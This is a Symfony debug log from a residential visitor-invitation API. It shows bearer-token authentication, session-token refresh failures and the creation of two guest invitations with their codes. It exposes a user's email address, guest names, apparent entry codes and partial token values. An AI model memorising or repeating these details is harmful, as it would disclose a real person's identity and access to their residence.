[2025-12-20 01:13:47] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:47] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:47] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:47] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:13:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:47] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:47] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:47] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:47] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:13:53] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-20 01:13:53] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:53] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 01:13:53] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 01:13:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:13:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:53] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-20 01:13:53] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 01:13:53] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"24b6c14d-9861-4702-a438-df [...]","2":1,"3":"2025-12-20 01:13:53","4":"2025-12-20 01:13:53","5":"Manuel","6":"Fonz","7":"749797","8":"/invitation/e09b82b6c5d978 [...]","9":"1","10":null,"11":"2025-12-20 01:13:00","12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-20 01:13:53] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-20 01:13:53] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:13:53] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-20 01:13:53] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:53] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 01:13:53] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 01:13:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:13:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:53] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:53] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:14:11] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-20 01:14:11] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:11] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 01:14:11] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 01:14:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:14:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:11] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-20 01:14:11] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 01:14:11] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"6763eb0f-d519-4cd2-a06a-0c [...]","2":1,"3":"2025-12-20 01:14:11","4":"2025-12-20 01:14:11","5":"Pedro","6":"Fonz","7":"157074","8":"/invitation/57cf45e2c81cc4 [...]","9":"1","10":null,"11":"2025-12-20 01:14:00","12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-20 01:14:11] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-20 01:14:11] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:14:11] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-20 01:14:11] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:11] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 01:14:11] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 01:14:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:14:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:11] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
